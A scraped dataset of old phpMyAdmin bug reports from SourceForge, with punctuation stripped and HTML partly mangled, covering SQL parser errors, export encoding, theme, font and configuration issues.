themes paradice img b edit.png width= 16 height= 16 alt= Bearbeiten gt; lt; a gt; lt; p gt; lt;p gt; lt;span class= syntax gt; lt;span class= syntax alpha syntax alpha reservedWord gt;SELECT lt; span gt; lt;span class= syntax punct gt; lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;FROM lt; span gt; lt;span class= syntax quote syntax quote backtick gt;`f export` lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;WHERE lt; span gt; lt;span class= syntax quote syntax quote backtick gt;`f id` lt; span gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;IN lt; span gt; lt;span class= syntax punct syntax punct bracket open round gt; lt; span gt; lt;span class= syntax digit syntax digit integer gt;89325 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;89323 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;90208 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;90209 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;91077 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93067 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93068 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93069 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93070 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93071 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93072 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93073 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93412 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93413 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;93759 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;97231 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;98330 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99276 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99277 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99278 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99279 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99280 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99713 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99714 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99715 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99716 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99717 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;99718 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;101945 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;101979 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109958 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109959 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109960 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109961 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109962 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109963 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109964 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109965 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109966 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109967 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109968 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109969 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109970 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109971 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109972 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109973 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109974 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109975 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109976 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109977 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109978 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;109979 lt; span gt; lt;span class= syntax punct syntax punct listsep gt;, lt; span gt; lt;span class= syntax digit syntax digit integer gt;121146 lt; span gt; lt;span class= syntax punct syntax punct bracket close round gt;) lt; span gt; lt;span class= syntax punct syntax punct queryend gt;; lt; span gt; lt;br gt; lt;br gt; lt;span class= syntax alpha syntax alpha reservedWord gt;LIMIT lt; span gt; lt;span class= syntax digit syntax digit integer gt;73 lt; span gt; lt; span gt; lt; p gt; lt;p gt; lt;strong gt;MySQL meldet lt; strong gt; lt;a href= http www.mysql.com doc en error returns.html target= mysql doc gt; lt;img class= icon src= .
themes paradice img b help.png width= 11 height= 11 alt= Dokumentation title= Dokumentation gt; lt; a gt; lt; p gt; lt;code gt; 1064 Fehler in der Syntax bei ; LIMIT 73 in Zeile 1. lt; code gt; lt;br gt; lt; div gt; lt;fieldset class= tblFooters gt; lt; fieldset gt; lt;script type= text javascript gt; lt;!
[CDATA[ window.parent.setAll de utf 8 , utf8 unicode ci , 1 , db , f export ); window.parent.reload querywindow db , f export , SELECT 2A FROM 60f export 60 WHERE 60f id 60 IN 2889325 2C89323 2C90208 2C90209 2C91077 2C93067 2C93068 2C93069 2C93070 2C93071 2C93072 2C93073 2C93412 2C93413 2C93759 2C97231 2C98330 2C99276 2C99277 2C99278 2C99279 2C99280 2C99713 2C99714 2C99715 2C99716 2C99717 2C99718 2C101945 2C101979 2C109958 2C109959 2C109960 2C109961 2C109962 2C109963 2C109964 2C109965 2C109966 2C109967 2C109968 2C109969 2C109970 2C109971 2C109972 2C109973 2C109974 2C109975 2C109976 2C109977 2C109978 2C109979 2C121146 29 3B ); ]] gt; lt; script gt; lt; body gt; lt; html gt; I think, this could be solved very easy.
I had to manually reproduce this query without the semicolon and the end and everything was fine.
bye Chris Original URL https sourceforge.net p phpmyadmin bugs 2034 https sourceforge.net p phpmyadmin bugs 2034 Original author cornsau Found in version 2.7.0 pl1","bug"
"24444","8401","Notices while browsing table.
While browsing table I get tons of those notices Notice Undefined property stdClass orgname in phpMyAdmin libraries common.lib.php on line 2207 Original URL https sourceforge.net p phpmyadmin bugs 2035 https sourceforge.net p phpmyadmin bugs 2035 Original author nijel Found in version Latest Git","bug"
"24444","8402","cannot display capitalised `Database` tables.
If a database begins with a Capital, e.g., Views or Hist no tables are displayed.
Other databses work normally.
This is not a problem for 2.7.0 pl2.
Original URL https sourceforge.net p phpmyadmin bugs 2036 https sourceforge.net p phpmyadmin bugs 2036 Original author mcclie Found in version 2.8.0 rc1","bug"
"24444","8403","2.8 welcome Protocol version missing.
in pma2.8.0rc1 instead of Protocol version 10 only 10 is displayed en,de).
Original URL https sourceforge.net p phpmyadmin bugs 2037 https sourceforge.net p phpmyadmin bugs 2037 Original author windkiel","bug"
"24444","8404","[Safari] naviframe links open in new window.
In Safari I m running 2.0.3 on OS X 10.4.5), all links in the left hand frame are now opening in a new window, rather than in the right hand content frame.
Well, all links except for when you choose a database from the database pulldown immediately upon loading the main phpMyAdmin page.)
Clicking on the home icon, clicking on a table name, anything it all opens in a new window.
I have beta1 and rc1 installed side by side, using the same config file, and I can verify that this is a new bug; beta1 behaves as it should links open in the right hand content frame).
I spent about 20 minutes trying to figure out what the bug is, to no avail; I d be happy to help however I can, but seem to be at an impasse as to what could be causing it!
Original URL https sourceforge.net p phpmyadmin bugs 2038 https sourceforge.net p phpmyadmin bugs 2038 Original author delfuego Found in version 2.8.0 rc1","bug"
"24444","8405","Missing translations.
This is just reminder what should be added to language files before next translation freeze.
Currently missing todo messages strErrorRenamingTable strInvalidDatabase strInvalidTableName strServers strSessionAutostartError Original URL https sourceforge.net p phpmyadmin bugs 2039 https sourceforge.net p phpmyadmin bugs 2039 Original author nijel Found in version Latest Git","bug"
"24444","8406","Swiching databases in left frame broken.
When I switch database in left frame light version) I get correct database in right frame, but in left is selected previously chosen database.
I didn t notice it up to now, maybe some todays commit caused this?
Original URL https sourceforge.net p phpmyadmin bugs 2040 https sourceforge.net p phpmyadmin bugs 2040 Original author nijel Found in version Latest Git","bug"
"24444","8407","Default font size too large.
I m using Seamonkey 1.0 and Firefox 1.5 and I checked in MSIE 6.0) all on Win XP and I ve noticed that the font sizes are by default too large.
Can we bring back the font sizes that were in 2.6.4?
There is quite an annoyance factor of having to reduce the font size every time I log in.
Original URL https sourceforge.net p phpmyadmin bugs 2041 https sourceforge.net p phpmyadmin bugs 2041 Original author luegner Found in version 2.8.0 rc1","bug"
"24444","8408","Query Parser doesn t support LIMIT anymore.
Hello, I am using phpMyAdmin 2.8.0 rc1, PHP 5.1.2 and MySQL 5.0.18 under Windows XP SP 2.
The table definition I am using is CREATE TABLE IF NOT EXISTS errors error type TINYINT UNSIGNED NOT NULL, error date DATE NOT NULL) ENGINE=MYISAM DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; When I try to submit the following query SELECT FROM `errors` ORDER BY error date LIMIT 1; the result is Error SQL query SELECT FROM `errors` ORDER BY error date LIMIT 1 LIMIT 0 , 200; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 200 at line 2 When I use the command line mysql.exe, the expected result is given immediately without error.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 2042 https sourceforge.net p phpmyadmin bugs 2042 Original author rele Found in version 2.8.0 rc1","bug"
"24444","8409","search combos default to key zero.
When searching a table, any field linked to another table that shows a combo box from which you can select the valuefrom the otehr table will now default to the record in the other table that has an index of zero.
If the other table has no record with a key of zero, then the combo box has no default value selected.
In previous version the combo box would always be empty with no default selection regardless of the keys in the other table.
see attached screen shot) Worked correctly in 2.6.4 pl1 and earlier.
Also present in 2.7.0 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 2043 https sourceforge.net p phpmyadmin bugs 2043 Original author davidbowman Found in version 2.7.0 pl2","bug"
"24444","8410","index and htaccess.
Hi!
There is incorrect set of favicon at index.php, this is the correct one lt;link rel= icon href= favicon.ico type= image x icon gt; lt;link rel= shortcut icon href= favicon.ico type= image x icon gt; because, if you put .
favicon.ico it will go to var www favicon.ico and it produce an apache error.
Second .htaccess) I m using Ubuntu 5.10 with latest updates and it doesn t run unless I change comment with the .htaccess file the line with php flag session.auto start 0 Check this problems for the final version... thanks!
Original URL https sourceforge.net p phpmyadmin bugs 2044 https sourceforge.net p phpmyadmin bugs 2044 Original author kmos Found in version 2.8.0 rc1","bug"
"24444","8411","Updating a multi table view.
When trying to update rows throug a view that is a join of several tables, most updates are impossible because phpMyAdmin tries to update all values even if they were not changed.
On most updates MySQL returns an error that it is not possible to update more than one base table.
The attached examples show that MySQL itself has no problem with most updates.
Original URL https sourceforge.net p phpmyadmin bugs 2045 https sourceforge.net p phpmyadmin bugs 2045 Original author emdeboas Found in version 2.8.1","bug"
"24444","8412","drop basetable of a view gives errors.
In all overviews of phpMyAdmin, views participate in a nice way.
Nevertheless, when you drop a base table on which a view is based, the phpMyAdmin interface becomes unusable until you drop the view manually.
Load the attached tables into some db and drop for example the table bedrijf to see the problem.
Original URL https sourceforge.net p phpmyadmin bugs 2046 https sourceforge.net p phpmyadmin bugs 2046 Original author emdeboas","bug"
"24444","8413","Exporting auto increment fields = 0.
Dump created by phpMyAdmin does not imports properly if auto increment primary key contains 0.
Example CREATE TABLE `test` `id` INT UNSIGNED NOT NULL AUTO INCREMENT , PRIMARY KEY `id` ) ); INSERT INTO `test` `id` ) VALUES 1 ), 2 ); UPDATE `test` SET `id` = 0 WHERE `id`=1; Now we have table test with two rows 0, 2).
Let s export it over phpMyAdmin CREATE TABLE `test` `id` int 10) unsigned NOT NULL auto increment, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO INCREMENT=3; INSERT INTO `test` VALUES 0); INSERT INTO `test` VALUES 2); Let s remove table and import dump delete from test; INSERT INTO `test` VALUES 0); INSERT INTO `test` VALUES 2); This queries in ALL versions of MySQL insert rows 2, 3), but NOT 0, 2).
Seems 0 makes MySQL to generate next auto increment value.
So, I suppose phpMyAdmin must generate the following dump ... INSERT INTO `test` VALUES 0); UPDATE `test` SET `id`=0 WHERE `id`=LAST INSERT ID ); INSERT INTO `test` VALUES 2); If auto increment field is 0, add UPDATE query after INSERT.
P.S.
All MySQL clients I have ever seen have the same bug.
If phpMyAdmin fix this bug, in would be the first and The One. )
P.P.S.
I understand that 0 in auto increment field is not a good idea while DB engineering, but dumper must not care about all that.
I think its purpose produce correct dumps, in all cases, on all databases.
Original URL https sourceforge.net p phpmyadmin bugs 2047 https sourceforge.net p phpmyadmin bugs 2047 Original author koteroff Found in version Latest Git","bug"
"24444","8414","application octetstream hex broken.
Hi, The application octetstream hex transform is broken.
It s output is always 5b 42 4c 4f 42 20 2d 20 32 30 20 42 79 74 65 73 5d which I guess) is the hex of [BLOB 20 Bytes] , which is not that useful .
Original URL https sourceforge.net p phpmyadmin bugs 2048 https sourceforge.net p phpmyadmin bugs 2048 Original author olafvdspek","bug"
"24444","8415","cannot set DEFAULT for PACK KEYS.
in table options you cannot set DEFAULT for PACK KEYS http dev.mysql.com doc refman 4.1 en create table.html PACK KEYS = \{0 | 1 | DEFAULT\} Set this option to 1 if you want to have smaller indexes.
This usually makes updates slower and reads faster.
Setting the option to 0 disables all packing of keys.
Setting it to DEFAULT MySQL 4.0) tells the storage engine to pack only long CHAR or VARCHAR columns.
MyISAM and ISAM only.)
Original URL https sourceforge.net p phpmyadmin bugs 2049 https sourceforge.net p phpmyadmin bugs 2049 Original author cybot tm","bug"
"24444","8416","utf 8 and latin1 export issues.
Using mysql 5 and pma 2.7.0 pl2, I was exporting a database to CSV.
The import application of the CSV output does not understand utf 8 encoding, which pma insisted of using.
I ve found that this traces back to the choice of language.
At the login page, if I choose Swedish sv iso 8859 1), it is then forced to UTF 8 by libraries database interface.lib.php 537, where current mysql version is checked, and then auto switch to utf 8 counterpart, and non UTF 8 choices [are removed] to avoid confusion .
I disabled the test for mysql version i.e.
I was still using sv iso 8859 1), and then the exported CVS used latin1 encoding as expected.
Now, I understand that UTF 8 is nice, but exports in other encodings may still be needed.
Maybe I m missing something, perhaps the export encoding can be specified somewhere else?
Regards, Stefan Original URL https sourceforge.net p phpmyadmin bugs 2050 https sourceforge.net p phpmyadmin bugs 2050 Original author alfs Found in version 2.7.0 pl2","bug"
"24444","8417","Manual INSERT doesn t enable browse tab.
When I manually enter INSERT query on empry table, browse and other data requiring) tab is not enabled.
I need to go on other page to make them enabled.
Original URL https sourceforge.net p phpmyadmin bugs 2051 https sourceforge.net p phpmyadmin bugs 2051 Original author nijel Found in version Latest Git","bug"
"24444","8418","Error failed to open stream .
I just downloaded and installed this release.
Using my old config file 2.8.0 This message came at the begining Warning main libraries Theme.class.php) failed to open stream No such file or directory in C \Webs\phpMyAdmin 2.8.0 rc2\libraries\Theme Manager.class.php on line 5 Fatal error main ) Failed opening required libraries Theme.class.php include path= C \Server\PhpIncludes ) in C \Webs\phpMyAdmin 2.8.0 rc2\libraries\Theme Manager.class.php on line 5 I edited Theme Manager.class.php and changed line 5 from require once libraries Theme.class.php ); TO require once Theme.class.php ); Tried again and worked.
Original URL https sourceforge.net p phpmyadmin bugs 2052 https sourceforge.net p phpmyadmin bugs 2052 Original author yacar suscri Found in version 2.8.0 rc2","bug"
"24444","8419","Export in SQL 3.23 lose the AUTO INCREMENT extra parameter.
Hi, Just perform the following step to reproduce the problem SQL Query DROP TABLE IF EXISTS `ndc groupama quizz`; CREATE TABLE IF NOT EXISTS `ndc groupama quizz` `ID` int 11) NOT NULL auto increment, `NAME` varchar 255) collate latin1 general ci NOT NULL, `BIRTHDATE` date NOT NULL, `FIRSTNAME` varchar 255) collate latin1 general ci NOT NULL, `WORK` varchar 255) collate latin1 general ci NOT NULL, `ADDRESS` varchar 255) collate latin1 general ci NOT NULL, `ZIPCODE` int 5) NOT NULL, `CITY` varchar 255) collate latin1 general ci NOT NULL, `TEL` varchar 255) collate latin1 general ci NOT NULL, `EMAIL` varchar 255) collate latin1 general ci NOT NULL, `NEWSLETTER` int 2) NOT NULL, `CLIENT` int 2) NOT NULL, `WINNER` int 2) NOT NULL default 0 , `INFO DATETIME` datetime NOT NULL, `INFO IP` varchar 255) collate latin1 general ci NOT NULL, `INFO BROWSER` varchar 255) collate latin1 general ci NOT NULL, PRIMARY KEY `ID`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1 general ci AUTO INCREMENT=2 ; Then, go to export on the new created table and select compatiblity SQL 323, you will have the following dump DROP TABLE IF EXISTS `ndc groupama quizz`; CREATE TABLE IF NOT EXISTS `ndc groupama quizz` `ID` int 11) NOT NULL, `NAME` varchar 255) NOT NULL, `BIRTHDATE` date NOT NULL, `FIRSTNAME` varchar 255) NOT NULL, `WORK` varchar 255) NOT NULL, `ADDRESS` varchar 255) NOT NULL, `ZIPCODE` int 5) NOT NULL, `CITY` varchar 255) NOT NULL, `TEL` varchar 255) NOT NULL, `EMAIL` varchar 255) NOT NULL, `NEWSLETTER` int 2) NOT NULL, `CLIENT` int 2) NOT NULL, `WINNER` int 2) NOT NULL default 0 , `INFO DATETIME` datetime NOT NULL, `INFO IP` varchar 255) NOT NULL, `INFO BROWSER` varchar 255) NOT NULL, PRIMARY KEY `ID`) ) TYPE=InnoDB AUTO INCREMENT=2 ; The AUTO INCREMENT is no more set to the ID field !!
I got the problem with all my export from mysql 5 to mysql 3.23 using the compatiblity funtionnality.
Hope this is possible to correct it in the next version.
Regards, Simon Original URL https sourceforge.net p phpmyadmin bugs 2053 https sourceforge.net p phpmyadmin bugs 2053 Original author gazou78 Found in version 2.8.0 rc2","bug"
"24444","8420","VIEW Data Export.
When you export a acomplete database, it generates insert commands also for views which of course fail on import.
Also the views are created before the actual tables which lets the creation of the views fail.
Might want to fix this bug.
Original URL https sourceforge.net p phpmyadmin bugs 2055 https sourceforge.net p phpmyadmin bugs 2055 Original author yanky22 Found in version 2.8.0 rc2","bug"
"24444","8421","Homepage link within.
When you click on Official phpMyAdmin Homepage on the right hand side of the home page, the url is wrong.
It is missing a it is currently put in as http www.phpmyadmin.netindex.php Original URL https sourceforge.net p phpmyadmin bugs 2056 https sourceforge.net p phpmyadmin bugs 2056 Original author stooley Found in version 2.8.0 rc2","bug"
"24444","8422","config.default.php changes not recognized.
Undefined index TitleServer in libraries header.inc.php on line 50 Original URL https sourceforge.net p phpmyadmin bugs 2057 https sourceforge.net p phpmyadmin bugs 2057 Original author cybot tm Found in version 2.8.0","bug"
"24444","8423","unsused var DOCUMENT ROOT.
unused variable DOCUMENT ROOT in db details importdocsql.php on line 121 to 135 I am not so familiar with docsql import script, possible someone can take a look into it and remove this.
Original URL https sourceforge.net p phpmyadmin bugs 2058 https sourceforge.net p phpmyadmin bugs 2058 Original author cybot tm","bug"
"24444","8424","octetstream download.
Seems we have problems with this transformation, at least since 2.6.4 pl4.
Data is not downloaded at all, it is displayed.
Work to do after 2.8.0...
Original URL https sourceforge.net p phpmyadmin bugs 2059 https sourceforge.net p phpmyadmin bugs 2059 Original author lem9","bug"
"24444","8425","Blobs centered.
Hi, Blobs are centered, even when a transform has been defined.
This doesn t look right and can t be fixed from within the transform.
lt;td align= center gt; lt;span align=left gt;db2db1b24f9be7b818fe946e85870a099daa8eed lt; span gt; lt; td gt; Original URL https sourceforge.net p phpmyadmin bugs 2060 https sourceforge.net p phpmyadmin bugs 2060 Original author olafvdspek","bug"
"24444","8426","theme directory not being processed correctly.
System setup WinXP SP2, Apache 2.0.55, PHP 5.1.2 I access phpMyAdmin v2.8.0 from http localhost utils phpMyAdmin dev I moved the themes directory to http localhost utils phpMyAdmin themes 2.3 I have selected the darkblue orange theme.
It seems to only partially work.
Images in lt;img gt; tags seem to work correctly, but images set in css files seem to have hardcoded src attributes without using the pmaThemeImage variable.
I searched for the string themes original in the php files and found it 48 times in 4 files.
26 were in the css\phpmyadmin.css.php script.
Hope this helps.
Thanks for all the great work on this wonderful project!
Original URL https sourceforge.net p phpmyadmin bugs 2061 https sourceforge.net p phpmyadmin bugs 2061 Original author swartzja Found in version 2.8.0","bug"
"24444","8427","PHP < 4.3.0 doesn t load config.inc.php.
With PHP 4.2.2 config.inc.php is ignored, because eval ?
gt; .
trim implode \n , file this gt;getSource ) )))); in Config.class.php in function load ) uses \n .
It should use or \n .
This is triggered by any PHP without file get contents ) which exists since PHP 4.3.0.
Original URL https sourceforge.net p phpmyadmin bugs 2062 https sourceforge.net p phpmyadmin bugs 2062 Original author julianladisch Found in version Latest Git","bug"
"24444","8428","Engine vs Type in MySQL 5.1.
Hi, I think MySQL 5.1 requires engine instead of type.
CREATE TABLE `xwi names` `nid` INT NOT NULL AUTO INCREMENT PRIMARY KEY , `name` VARCHAR 9 ) NOT NULL , UNIQUE `name` ) ) TYPE = MYISAM MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near TYPE = myisam at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2063 https sourceforge.net p phpmyadmin bugs 2063 Original author olafvdspek Found in version 2.8.0","bug"
"24444","8429","2.8.0 cookie login not working IIS).
We have pma 2.7.0 pl2 running fine with cookie authentication.
I installed 2.8.0 into a separate folder but can t get cookie authentication to work.
No matter what username password I try valid or not) I just get sent back to the login screen with no error message.
If I switch to config authentication, I get logged in fine using the same username password as I try with cookie.
So the config file seems okay.
I have tried our 2.7.0 pl2 config file.
I have tried a fresh new config file from the setup script.
Same results either way.
I have deleted my stored cookies for the server.
No change.
PHP 4.4.1 mySQL 4.1.10 IIS 5.0 on Windows 2000 Server Browsers IIS 6, Avant 10.1, Safari Original URL https sourceforge.net p phpmyadmin bugs 2064 https sourceforge.net p phpmyadmin bugs 2064 Original author davidbowman Found in version 2.8.0","bug"
"24444","8430","Fonts too big version 2.8.
The Version 2.8 of PMA shows very big font s size when using this version and the Origiinal theme.
It occurs either in IExplorer or Firefox.
When you select Darkblue Orange theme things go back to normal size.
Example of their presentation can be found at Original Theme Using Firefox http www.websprogrammer.com PMA Errors 20060307 Error01 01 20060307.png gt;Original Theme Using IExplorer http www.websprogrammer.com PMA Errors 20060307 Error01 03 20060307.png gt;DarkBlue Orange Theme Using Firefox http www.websprogrammer.com PMA Errors 20060307 Error01 02 20060307.png gt;DarkBlue Orange Theme Using IExplorer http www.websprogrammer.com PMA Errors 20060307 Error01 04 20060307.png Original URL https sourceforge.net p phpmyadmin bugs 2065 https sourceforge.net p phpmyadmin bugs 2065 Original author yacar suscri","bug"
"24444","8431","Fonts too big version 2.8.
The Version 2.8 of PMA shows very big font s size when using this version and the Origiinal theme.
It occurs either in IExplorer or Firefox.
When you select Darkblue Orange theme things go back to normal size.
Example of their presentation can be found at Original Theme Using Firefox http www.websprogrammer.com PMA Errors 20060307 Error01 01 20060307.png gt;Original Theme Using IExplorer http www.websprogrammer.com PMA Errors 20060307 Error01 03 20060307.png gt;DarkBlue Orange Theme Using Firefox http www.websprogrammer.com PMA Errors 20060307 Error01 02 20060307.png gt;DarkBlue Orange Theme Using IExplorer http www.websprogrammer.com PMA Errors 20060307 Error01 04 20060307.png Original URL https sourceforge.net p phpmyadmin bugs 2066 https sourceforge.net p phpmyadmin bugs 2066 Original author yacar suscri","bug"
"24444","8432","214.7 KB vs 206,720 Bytes.
Hi, The size column says 214.7 KB but the overhead column says 206,720 Bytes.
Shouldn t overhead be using KB too?
It may also be a good idea to use the same unit B, KB, MB, GB, TB) in all rows of a column instead of KB in some and MB in others.
Original URL https sourceforge.net p phpmyadmin bugs 2067 https sourceforge.net p phpmyadmin bugs 2067 Original author olafvdspek","bug"
"24444","8433","error with array key exists PHP 4.2.2).
Using phpMySQL 2.8.0.1, MySQL 3.23.52 and PHP 4.2.2 server databases.php gives this error message several times Warning Wrong datatype for second argument in call to array key exists in srv https phpMyAdmin 2.8.0.1 server databases.php on line 183 The debug statement echo print r databases); inserted in line 181 of server databases.php gives Array [test] = gt; Array [SCHEMA NAME] = gt; test ) ) 1 array key exists stat name, databases[0] ) triggers the error because databases[0] is 1 which is not an array.
Original URL https sourceforge.net p phpmyadmin bugs 2068 https sourceforge.net p phpmyadmin bugs 2068 Original author julianladisch Found in version 2.8.0.1","bug"
"24444","8434","red border in outdated themes.
Since 2.8.0 the SQL query textarea has had an ugly 1px red border when viewed in either Firefox 1.5.0.1 or Camino 1.0 another Gecko browser).
2.7.0 pl2 did not do this.
The red border does not show up in Safari 2.0.3.
The diff of css phpmyadmin.css.php between 2.7.0 pl2 and 2.8.0.1 shows the following change which seems to account for this 300,7 168,7 Gecko bug div[class=formelementrow], div[id=queryfieldscontainer] \{ border 1px solid transparent; \ border 1px solid red; \} div sqlquerycontainer \{ Changing it back to transparent would seem to be the fix.
Original URL https sourceforge.net p phpmyadmin bugs 2069 https sourceforge.net p phpmyadmin bugs 2069 Original author ryandesign Found in version 2.8.0.1","bug"
"24444","8435","Weird answer after browse after query error.
I had this strange answer when following the browse button after trying to insert a record already existin in the table.
There are 3 attachment with the screens reproducing the error.
Original URL https sourceforge.net p phpmyadmin bugs 2070 https sourceforge.net p phpmyadmin bugs 2070 Original author yacar suscri","bug"
"24444","8436","Colors hardcoded in theme css files.
Configuration in themes ... layout.inc.php does not carry over to ....css.php files.
For example, in theme left.css.php of the original theme, line 5 background color is a hardcoded value instead of background color lt;?php echo GLOBALS[ cfg ][ LeftBgColor ]; ?
gt;; So changing the value in layout.inc.php accomplishes nothing Original URL https sourceforge.net p phpmyadmin bugs 2071 https sourceforge.net p phpmyadmin bugs 2071 Original author jpkunst Found in version 2.8.0.1","bug"
"24444","8437","FAQ numbers missing in Documentation.html.
Recently the FAQ numbers have disappeared from Documenation.html.
This makes it really hard to point users to the correct FAQ entry and additionally makes that section look more cluttered to me, because it s gone from an organized list of FAQ 1.1, 1.2, etc to a random looking list of questions and answers.
Can we re add the numbers to the FAQ questions?
Original URL https sourceforge.net p phpmyadmin bugs 2072 https sourceforge.net p phpmyadmin bugs 2072 Original author ibennetch Found in version Latest Git","bug"
"24444","8438","CSS Broken IE issues).
Hello, I m currently running PHPMyAdmin 2.8.0.1 on my server, with Apache 1.3.34, PHP 4.4.2, and MySQL 4.1.
Everything seems be working fine, except for the CSS.
All font is the same size, and everything seems to spread out too much.
The login page is full width, instead of the small table from before.
This happens when I use my old config as well.
Thanks, Alex Original URL https sourceforge.net p phpmyadmin bugs 2073 https sourceforge.net p phpmyadmin bugs 2073 Original author adb22791 Found in version 2.8.0.1","bug"
"24444","8439","The setup creates wrong arrays in config.inc.php.
The array in config.inc.php are created with element separator ; instead of , I changed in scripts setup.php at line 437 from lt;?
ret .= .
var export v, TRUE) .
;\n ; ?
gt; to lt;?
ret .= .
var export v, TRUE) .
,\n ; ?
